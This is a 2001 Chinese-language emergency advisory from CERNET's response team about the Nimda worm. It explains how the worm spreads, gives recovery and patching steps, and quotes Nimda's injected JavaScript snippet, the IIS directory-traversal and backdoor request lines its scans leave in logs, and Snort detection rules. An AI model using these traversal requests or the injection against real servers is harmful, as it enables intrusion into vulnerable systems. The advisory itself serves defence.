中国教育与科研计算机网CERNET


关于防范Nimda蠕虫病毒的紧急通知

CERNET各地区网络中心、省节点网络中心和各联网单位网络中心:
  9月18日,一种更具破坏力的恶意代码——Nimda worm 蠕虫开始在Internet上迅速蔓延传播。Nimda蠕虫病毒感染Windows 系列多种计算机系统,通过多种渠道传播,其传播速度之快、影响范围之广、破坏力之强都超过Code Red II。
  目前已经检测到大量被感染的计算机系统,危害严重,希望各部门紧密关注。为了确保中国教育和科研计算机网CERNET的安全可靠运行,提高抗攻击能力,特对全网的各级网络运行管理中心发出此紧急通知。

  一 、影响系统
  Windows95, 98,ME,NT 和2000 所有客户端和服务器系统

  二 、传播方式
  * 通过电子邮件从一个客户端感染另一个客户端
  * 通过开放的网络共享从一个客户端感染另一个客户端
  * 通过浏览被感染的网站从Web 服务器感染客户端
  * 通过主动扫描或利用 “Microsoft IIS 4.0 / 5.0 directory traversal”的缺陷”从客户端感染Web 服务器
  * 通过扫描 “Code Red” (IN-2001-09),和 “sadmind/IIS” (CA-2001-11) 留下的后门从客户端感染Web 服务器

  三 、影响
  感染Nimda 病毒的机器会不断向Windows 的地址薄中的所有的邮件发送携带了Nimda病毒的邮件的拷贝。
  同样的,客户端机器会扫描有漏洞的IIS 服务器。Nimda 会搜寻以前的IIS蠕虫病毒留下的后门:Code Red II [IN-2001-09] 和 sadmind/IIS worm [CA-2001-11]; 它也试图利用IIS Directory Traversal 漏洞 (VU #111677)。
  初步分析表明, 该病毒除了改变网页的目录以繁衍自身外没有其它破坏性的行为。但通过大量发送电子邮件和扫描网络可以导致网络的“拒绝服务”(DoS)。

  四 、分析
  被感染的机器会发送一份Nimda病毒代码复本到任何在扫描中发现有漏洞的服务器。一旦在该服务器上运行,蠕虫就会遍历系统里的每一个目录(甚至包括所有通过共享文件可以读取得目录),然后会在磁盘里留下一份自身拷贝,取名为"README.EML"。一旦找到了含有web内容的目录(包含html或asp文件),下面Javascript代码段就会被添加到每一个跟web有关的文件中:
  <script language="JavaScript">window.open("readme.eml", null,
  "resizable=no,top=6000,left=6000")
  </script>
  这段代码使得蠕虫可以进一步繁衍,通过浏览器或浏览网络文件感染到新的客户端。

  通过浏览器传播
  作为感染过程的一部分,Nimda 更改所有的含有web内容的文件(象 .htm, ,html, .asp 等文件)。这样,任何用户浏览该文件,不管是通过浏览器还是网络,就可能会下载一份该病毒。有些浏览器会自动的执行下载动作,感染正在浏览该网站的机器。
  通过文件系统感染
  Nimda病毒生成大量的自身的复本,取名为README.EML, 写到该用户有可写权限的目录里。如果在另一台机器的用户通过网络共享选取病毒文件,并且设置了预览功能的话,蠕虫就会威胁到这台新的机器。
  系统记录
  对任何开放80/tcp端口的web服务器,Nimda蠕虫的扫描会生成下面的日志:
  GET /scripts/root.exe?/c+dir
  GET /MSADC/root.exe?/c+dir
  GET /c/winnt/system32/cmd.exe?/c+dir
  GET /d/winnt/system32/cmd.exe?/c+dir
  GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
  GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
  GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
  GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\
    x1c../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
  注:这个例子的前四行表明在试图连接Red Code II 留下的后门,例子的其余部分在试图利用Directory Traversal 漏洞。

  五 、解决方案
  各级网络中心和联网单位网络中心领导必须高度重视抵抗本次病毒工作,迅速组织网络运行管理人员, 密切监视网络运行状态,一旦发现此类蠕虫,立即报告CERNET国家网络中心紧急响应组织CCERT,并根据CCERT要求的处理程序,迅速采取处理措施。      

  5.1 对IIS系统管理员的建议
  1. 检查系统是否被感染,查找以下内容:
    * root.exe (表明系统受到过Code Red II或sadmind/IIS蠕虫的损害,易于受到Nimdaa蠕虫的攻击)¨
    * 在包含网络内容的目录下的admin.dll或异常.eml文件(表明受到Nimdaa蠕虫的攻击)
    要从损害中恢复系统,只有从安全的来源重装系统和系统软件(供应商提供的光盘)。重装后还应安装全部安全补丁。这个过程中系统应与网络断开连接。如果所有网络服务关闭的话,也可以从网络下载补丁。
    具体的恢复细节可以参考 CERT/CC网站,
   http://www.cert.org/tech_tips/win-UNIX-system_compromise.html
  2. 从提供商处获取补丁
    对所有与IIS相关的漏洞,可以从下面站点下载补丁:
    http://www.ccert.edu.cn
   http://www.microsoft.com/technet/security/bulletin/MS01-044.asp


  5.2 对端用户的建议
  1.从提供商处获取补丁对使用有漏洞的IE的用户,建议从下面下载针对Automatic Execution of Embedded MIME Types漏洞的补丁:
  http://www.microsoft.com/technet/security/bulletin/MS01-020.asp
  2.运行和维护防病毒产品升级反病毒软件是重要的,多数反病毒软件供应商已经提供病毒库或相关信息和工具,从而提供对系统的保护并能部分恢复系统。如果反病毒软件包能够自动升级,建议使用自动升级。
  3.在打补丁之前,不要查看来历不明的电子邮件,更不能打开附件。Nimdaa蠕虫可以作为email的readme.exe附件,不能打开这种附件。如果使用Outlook Express ,这种邮件连看都不能看。
  4.关闭JavaScript,Nimdaa蠕虫可以利用网页浏览感染端用户的系统,这种感染方式利用JavaScript传播,因此建议关闭JavaScript。

  5.3 对网络管理员的建议 
  (1) 立即通知所有网络用户关于Nimda的危害和防御办法;
  (2) 采用监听工具及时发现被红色蠕虫病毒感染的主机系统,在入侵检测系统中增加如下特征的检测规则:

  alert tcp !$HOME_NET any -> $HOME_NET 80 (msg:"Nimda worm "; content: "GET /scripts/root.exe"; nocase;)
  alert tcp !$HOME_NET any -> $HOME_NET 80 (msg:"Nimda worm "; content: "GET /MSADC/root.exe"; nocase;)
  alert tcp !$HOME_NET any -> $HOME_NET 80 (msg:"Nimda worm "; content: "GET /c/winnt "; nocase;)
  alert tcp !$HOME_NET any -> $HOME_NET 80 (msg:"Nimda worm "; content: "GET /d/winnt "; nocase;)
  alert tcp !$HOME_NET any -> $HOME_NET 80 (msg:"Nimda worm "; content: "GET /scripts/.. "; nocase;)
  alert tcp !$HOME_NET any -> $HOME_NET 80 (msg:"Nimda worm "; content: "GET /_vti_bin/.. "; nocase;)
  alert tcp !$HOME_NET any -> $HOME_NET 80 (msg:"Nimda worm "; content: "GET /_mem_bin/.. "; nocase;)
  alert tcp !$HOME_NET any -> $HOME_NET 80 (msg:"Nimda worm "; content: "GET /msadc/.."; nocase;)
  alert tcp !$HOME_NET any -> $HOME_NET 80 (msg:"Nimda worm "; content: " GET /system32/cmd.exe "; nocase;)
  (3) 发现感染主机,立即向CCERT报告被感染的主机地址、Web访问日志及其相关信息。 CERNET紧急响应组CCERT的联系办法如下:      
     电话: 010-62784301     传真 : 010-62785933
     URL: http://www.ccert.edu.cn/   Email:report@ccert.edu.cn  

中国教育和科研计算机网CERNET
中国教育和科研计算机网应急响应组CCERT
2001年9月19日

详细介绍和解决办法